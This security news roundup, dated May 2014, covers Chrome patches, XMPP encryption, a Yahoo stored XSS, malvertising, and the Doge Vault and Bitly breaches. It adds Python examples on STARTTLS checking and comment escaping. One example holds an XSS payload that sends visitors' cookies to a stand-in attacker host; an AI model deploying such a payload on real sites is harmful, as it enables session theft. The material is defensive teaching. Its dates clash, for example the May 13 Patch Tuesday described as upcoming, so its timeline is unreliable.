
Google patched 23 security vulnerabilities in its Chrome browser


May 21, 2014


Google says it has patched 23 security vulnerabilities in its Chrome browser, three of them rated High severity, in the latest stable update of the product.

The company has yet to release specific details of the full set of patched bugs, which were pushed out overnight in Chrome 35 for Windows, Mac and Linux.

Chrome engineer Karen Grunberg said Google paid $9,500 to external researchers for reporting security vulnerabilities in the release, including use-after-free bugs and a cross-site scripting flaw.

The latest version also gives developers more control over touch input, and adds newer JavaScript features and APIs for mobile apps and their extensions.

A particularly interesting bug in the set, discovered in April, allowed the old speech API in Chrome to be abused to eavesdrop on users through the microphone.

Bug bounties Google acknowledged in the release include:

  • $3000 for 356653 – High – CVE-2014-1743: Use-after-free in styles.
  • $3000 for 359454 – High – CVE-2014-1744: Integer overflow in audio.
  • $1000 for 346192 – High – CVE-2014-1745: Use-after-free in SVG.
  • $1000 for 364065 – Medium – CVE-2014-1746: Out-of-bounds read in media filters.
  • $1000 for 330663 – Medium – CVE-2014-1747: UXSS with local MHTML file.
  • $500 for 331168 – Medium – CVE-2014-1748: UI spoofing with scrollbar.

In a tip to would-be bug hunters, Grunberg said that many of the listed vulnerabilities were found using AddressSanitizer, the memory-error detector Google released in 2012.

In other internet security news

A whole slew of instant messaging service providers began refusing unencrypted connections today, following a request to harden the Extensible Messaging and Presence Protocol (XMPP).

Two years ago, developers asked that client-to-server and server-to-server encryption for XMPP be tested from January 2014, as a first step towards securing the protocol against criminals and government spies.

The XMPP Standards Foundation initiative covered at least seventy service providers, but could not be enforced.

Peter Saint-André, the technologist behind the initiative, welcomed the go-live date. "Today, a large number of services on the public XMPP network permanently turned on mandatory encryption for client-to-server and server-to-server connections," Saint-André said.

"This is the first step toward making the XMPP network more secure for all users," he added. Signatory company Prosodical said the non-binding request was a necessary precondition to other security improvements as well.

"While XMPP is an open distributed network, obviously no single entity can mandate encryption for the whole network, but as a group we are moving in the right direction," the company said in a blog post.

"This commitment to encrypted connections is only the first step toward more secure communications using XMPP, and does not obviate the need for technologies supporting end-to-end encryption such as Off-the-Record Messaging, strong authentication, channel binding, secure DNS, server identity checking, and secure service delegation," Saint-André said.

Overall, the change is enough to defeat passive eavesdropping, and it follows moves by the broader tech industry to lock down communications and move away from the CA model in the wake of the National Security Agency snooping disclosures.

The similar 'Reset the Net' initiative was launched by a coalition of privacy advocates to push SSL, end-to-end encryption, perfect forward secrecy and HTTP Strict Transport Security across the internet.
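
On the wire, "mandatory encryption" for an XMPP connection is signalled the way RFC 6120 describes: the server's first stream features carry a starttls element, and a server that refuses plaintext marks it with a required child. The following Python is an added example (not code from the article, the XMPP Standards Foundation, Prosodical or any of the signatory providers) that classifies a server's advertisement into required, optional or absent, and shows the client-side rule that makes the providers' commitment hold up against an active attacker: never authenticate in the clear, even when the starttls feature is missing, because stripping that feature is exactly what a downgrade attack does. The three feature stanzas are constructed samples; the probe function needs network access and is not exercised by the offline samples.

```python
"""Classify an XMPP server's STARTTLS policy from its <stream:features>.

Added example; not code from the article, the XMPP Standards Foundation or any
provider. Per RFC 6120 section 5.4.1 a server that mandates TLS advertises
<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'><required/></starttls>.
The three feature stanzas below are constructed samples.
"""
import socket
import xml.etree.ElementTree as ET

NS_TLS = "urn:ietf:params:xml:ns:xmpp-tls"

# Constructed samples of what a server sends right after the client's stream header.
FEATURES_REQUIRED = (
    "<stream:features xmlns:stream='http://etherx.jabber.org/streams'>"
    "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'><required/></starttls>"
    "</stream:features>"
)
FEATURES_OPTIONAL = (
    "<stream:features xmlns:stream='http://etherx.jabber.org/streams'>"
    "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>"
    "<mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'>"
    "<mechanism>PLAIN</mechanism></mechanisms>"
    "</stream:features>"
)
# What a downgrade attacker in the path presents: the <starttls/> feature stripped.
FEATURES_NONE = (
    "<stream:features xmlns:stream='http://etherx.jabber.org/streams'>"
    "<mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'>"
    "<mechanism>PLAIN</mechanism></mechanisms>"
    "</stream:features>"
)


def starttls_policy(xml_text):
    """Return 'required', 'optional' or 'none' for a features element, or for a
    whole <stream:stream> document that contains one."""
    root = ET.fromstring(xml_text)
    for starttls in root.iter("{%s}starttls" % NS_TLS):
        if starttls.find("{%s}required" % NS_TLS) is not None:
            return "required"
        return "optional"
    return "none"


def client_action(policy, require_tls=True):
    """Next step for a client. With require_tls=True the client never sends SASL
    credentials in the clear, so stripping <starttls/> from the features only
    yields a closed stream instead of a plaintext session the attacker can read."""
    if policy in ("required", "optional"):
        return "starttls"
    return "abort" if require_tls else "plaintext"


STREAM_HEADER = (
    "<?xml version='1.0'?><stream:stream to='%s' version='1.0' "
    "xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams'>"
)


def probe(domain, host=None, port=5222, timeout=5.0):
    """Open a plaintext c2s connection to a live server and classify its first
    features stanza. Needs network access; the offline samples never call it.
    SRV lookup is skipped: host defaults to the domain itself (an assumption)."""
    buf = b""
    with socket.create_connection((host or domain, port), timeout=timeout) as sock:
        sock.sendall((STREAM_HEADER % domain).encode())
        while b"</stream:features>" not in buf:
            chunk = sock.recv(4096)
            if not chunk:
                break
            buf += chunk
    text = buf.decode("utf-8", errors="replace").lstrip()
    # The server's stream is still open; close it syntactically so it parses.
    if "</stream:stream>" not in text:
        text += "</stream:stream>"
    return starttls_policy(text)


if __name__ == "__main__":
    for label, sample in (("required", FEATURES_REQUIRED),
                          ("optional", FEATURES_OPTIONAL),
                          ("stripped", FEATURES_NONE)):
        policy = starttls_policy(sample)
        print("%-8s -> policy=%s, client=%s" % (label, policy, client_action(policy)))
```

The classification tells you only what the server is willing to do; it says nothing about whom you are talking to. Verifying the certificate against the domain (or via DANE) is the "server identity checking" the quoted manifesto lists separately, and a client that negotiates TLS but skips that check is still open to an active attacker with any certificate. The same required/optional distinction applies on server-to-server links, where the policy has to be enforced for both directions of a federation pair.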

In other internet security news

Yahoo said this morning that it has patched a cross-site scripting (XSS) flaw in the commenting system it uses across most of its websites.

Yahoo closed two attack vectors affecting a long list of services, covering topics as diverse as shopping and sport, two weeks after they were reported on May 2nd.

California web developer and security researcher Behrouz Sadeghipour said that attackers could steal Yahoo users' session cookies and tokens by injecting code into the comment system.

In a public disclosure, he said the attack could have been combined with bot servers to compromise users in a more distributed manner.

"The websites will store the string and present it to anyone visiting the post containing the comment," Sadeghipour said.

"So with a sample bot we could post a comment containing malicious code to hijack the visitors' session cookie.

"We could also simply target a specific user by linking to a post containing a comment with malicious code from the attacker," he added.

All Yahoo top-level domains were affected by the stored XSS, placing thousands of daily commenters at risk.

Sadeghipour also revealed a less dangerous self-XSS that could likewise be placed in the comments section and engineered to target users by appearing under the 'most recent' or 'most discussed' fields.

Overall, cross-site scripting flaws litter the internet and can cause varying degrees of damage. At the most severe, users can be served malware or have their accounts compromised.

System admins should consult OWASP for guidance on removing such vulnerabilities from their websites.
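
The mechanism Sadeghipour describes, a stored comment that runs in every visitor's browser and reads their session cookie, is illustrated by the following added Python example, which is neither Yahoo's code nor the researcher's proof of concept. It renders a constructed comment list two ways, the vulnerable string interpolation beside the escaped form, and shows the HttpOnly cookie attribute that keeps a session token out of reach of document.cookie even where escaping is missed. The payload, the comments, the page template and the attacker host name are all constructed for the example.

```python
"""Stored XSS in a comment system: vulnerable rendering beside the hardened form.

Added example; not Yahoo's code or the researcher's proof of concept. The
comments, payload, template and attacker host are constructed for the example.
"""
import html

# Constructed attacker comment of the kind the article describes: rendered
# unescaped, it runs in every visitor's browser and ships document.cookie to the
# attacker's collection host (attacker.invalid is a reserved, non-resolving name).
PAYLOAD = ("<script>new Image().src='http://attacker.invalid/c?'"
           "+encodeURIComponent(document.cookie)</script>")

SAMPLE_COMMENTS = [
    {"author": "alice", "body": "Good write-up, thanks."},
    {"author": "mallory", "body": PAYLOAD},
    # Attribute-context probe: breaks out of a quoted attribute if unescaped.
    {"author": "bob' onmouseover='alert(1)", "body": "hi"},
]

TEMPLATE = "<div class='comment' data-author='%s'><b>%s</b>: %s</div>"


def render_vulnerable(comments):
    """Interpolates stored text straight into HTML (the bug): markup in any
    field becomes live markup for every visitor who loads the page."""
    return "".join(TEMPLATE % (c["author"], c["author"], c["body"]) for c in comments)


def render_hardened(comments):
    """Escapes every untrusted field for the HTML context it lands in.
    quote=True also turns ' and " into entities, which is what keeps the
    author field inside the data-author='...' attribute."""
    return "".join(
        TEMPLATE % (html.escape(c["author"], quote=True),
                    html.escape(c["author"], quote=True),
                    html.escape(c["body"], quote=True))
        for c in comments
    )


def session_cookie_header(session_id, secure=True):
    """Set-Cookie value for the session token. HttpOnly hides it from
    document.cookie, so a script that does slip through cannot exfiltrate the
    token itself (it can still act as the victim while the page is open);
    Secure keeps it off plaintext HTTP."""
    attrs = ["session=%s" % session_id, "Path=/", "HttpOnly"]
    if secure:
        attrs.append("Secure")
    return "; ".join(attrs)


def has_live_markup(rendered, comments):
    """Check: did any raw comment field containing a '<' or a quote survive into
    the output verbatim, i.e. without being entity-encoded?"""
    for c in comments:
        for field in (c["author"], c["body"]):
            if ("<" in field or "'" in field) and field in rendered:
                return True
    return False


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(SAMPLE_COMMENTS))
    print("hardened:  ", render_hardened(SAMPLE_COMMENTS))
    print("cookie:    ", session_cookie_header("0123abcd"))
```

Two caveats a practitioner will want. Escaping is context-specific: html.escape is right for HTML text and quoted attribute values, but a field that lands inside a script block or a URL needs the encoding for that context, which is the point of the OWASP XSS prevention guidance the article points to. And HttpOnly limits cookie theft, not abuse: injected script can still issue requests with the victim's session while the page is open, so a Content Security Policy that forbids inline script is worth adding as a second layer.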

In other internet security news

Earlier this morning, the U.S. Senate issued a report calling for the online advertising industry to greatly improve its defences against malware attacks, and for lawmakers to legislate tougher penalties should the industry fail to do so.

The Committee on Homeland Security and Governmental Affairs said that the advertising landscape as it now exists makes it impossible for users to be protected against malware attacks while visiting websites.

"The online advertising industry has grown in complexity to such an extent that each party can conceivably claim that it's simply not responsible when malware is delivered to a user's computer through an advertisement," the committee said in its report.

"An ordinary online advertisement typically goes through five or six intermediaries before being delivered to a user's browser, and the ad networks themselves rarely deliver the actual advertisement from their own servers," the report said.

The analysis, the result of a subcommittee investigation into malware incidents such as the recent attack on Yahoo, concludes that the advertising sector is unable to police itself under current standards.

As such, heightened efforts will be required from industry bodies to impose security standards and to build networks for sharing information on cyber threats and incidents, the report concludes.

Additionally, the committee believes that ad networks should implement "circuit breaker" protections, whereby site administrators or network operators can check for and disable ads containing malicious code at various points in the ad-serving chain.

Should the industry fail to put the needed protections in place, the senators recommend that stronger laws be written and additional powers granted to regulatory agencies.

"Self-regulatory bodies should endeavor to develop comprehensive security guidelines for preventing online advertising malware attacks," the committee said.

"In the absence of effective self-regulation, the FTC should consider issuing comprehensive regulations to prohibit deceptive and unfair online advertising practices that facilitate or fail to take reasonable steps to prevent malware, invasive cookies, and inappropriate data collection delivered to Internet consumers through online advertisements."

The committee plans to follow up the report with a hearing later today.

In other internet security news, a website that claimed to hold the cryptocurrency Dogecoin under conditions of optimal security has gone offline.

The site now displays the following message: "Notice: We apologise for the downtime, a press release will be posted here within 24 hours. Please do not transfer any funds to Dogevault addresses while our investigation is under way. Email for any enquiries."

Then, at 8:27 AM EST, the following message was posted: "Announcement: On May 11, 2014, the Doge Vault online wallet service was compromised by attackers, resulting in a service disruption and tampering with wallet funds. As soon as the administrator of Doge Vault was alerted, the service was halted."

"The attackers had already accessed and destroyed all data on the hosted virtual machines. We are currently in the process of identifying the extent of the attack and potential impact on users' funds."

"This involves salvaging existing wallet data from an off-site backup. We will also be closely investigating potential attack vectors, and determining the security breach which enabled the attackers to compromise the service in the first place."

"Please do not transfer any funds to Doge Vault addresses while our investigation is under way. Thank you for your patience; we will issue an additional statement including our findings and plan of action within the next 24-48 hours. Email for any enquiries. Doge Vault."

After Bitcoin exchange Mt. Gox went bankrupt not long ago, some observers are now wondering whether the same fate could befall Dogecoin, and you can't blame them for thinking along those lines.

Speculation is rife in posts such as a Reddit thread that the site was hacked, taking with it at least 950,000 Dogecoins. Another report suggests that up to 111 million Dogecoins have mysteriously appeared in a "mega wallet" linked to Dogevault.

With the Dogecoin to US dollar exchange rate running at about 1000:$0.46, 111 million Dogecoins is worth about $51,000: hardly the millions suspected to have evaporated from Mt. Gox, but still a nasty amount of cryptocash to lose.

If Dogevault has indeed been fatally compromised, it will be harder to sustain enthusiasm for cryptocurrency. Whatever the upsides of the concept, the security of some participants clearly needs to be tightened, and in a very big way.

In other internet security news

Microsoft's security team said yesterday that it will release eight security updates next Patch Tuesday to close remote code execution holes in Windows and Internet Explorer, among other security bugs.

Meanwhile, Adobe will issue new versions of Acrobat and Reader for this month's Patch Tuesday as well, so May 13 will be a busy day for system admins and IT departments everywhere.

Two of the Microsoft updates are rated critical because they allow attackers to execute code on vulnerable systems remotely: Windows from Server 2003 to Windows 8, Internet Explorer 6 to 11, and some SharePoint-related software are all at risk, Microsoft warns.

The other six updates are rated important: one is a remote code execution hole, four lead to privilege escalation, and one allows a security feature to be bypassed altogether.

The affected software includes Microsoft Office 2007 to 2013, Windows and the .NET Framework.

As always, Microsoft withholds further details of the vulnerabilities until the patches are released, for obvious reasons.

The May 13 release will be the first in more than 10 years not to include any bulletins for Windows XP.

The outdated operating system was officially retired from support by Microsoft on April 8, though subsequent exploitation of flaws in it by miscreants forced the company to issue an out-of-band update regardless.

Adobe, meanwhile, will update four versions of its Reader and Acrobat software: the fix addresses critical flaws in Reader and Acrobat 10 and 11 on both Windows and OS X.

Users and system administrators are well advised to test and deploy all of next Tuesday's security patches as soon as possible, or risk falling victim to exploits targeting the newly disclosed vulnerabilities.

In other internet security news

Online marketing and URL-shortening firm Bitly has warned its users that its systems were broken into by unknown parties, and urged them to change their passwords as soon as possible.

In a security advisory, the company says: "We have strong reasons to believe that Bitly account credentials have been seriously compromised, but we have no indication at this time that any accounts have been accessed without permission."

The company also promises that it has "already taken proactive measures to secure all paths that led to the compromise in the first place, and to ensure the security of all account credentials going forward."

However, don't get too comfortable. Bitly strongly encourages its users to use OAuth to link their accounts with Facebook and Twitter.

As an additional layer of safety, the firm has severed those links to stop account hijacking and to help prevent another potential attack.


Source: Google.

Copyright © Internet    Terms of use    Privacy agreement    Legal disclaimer
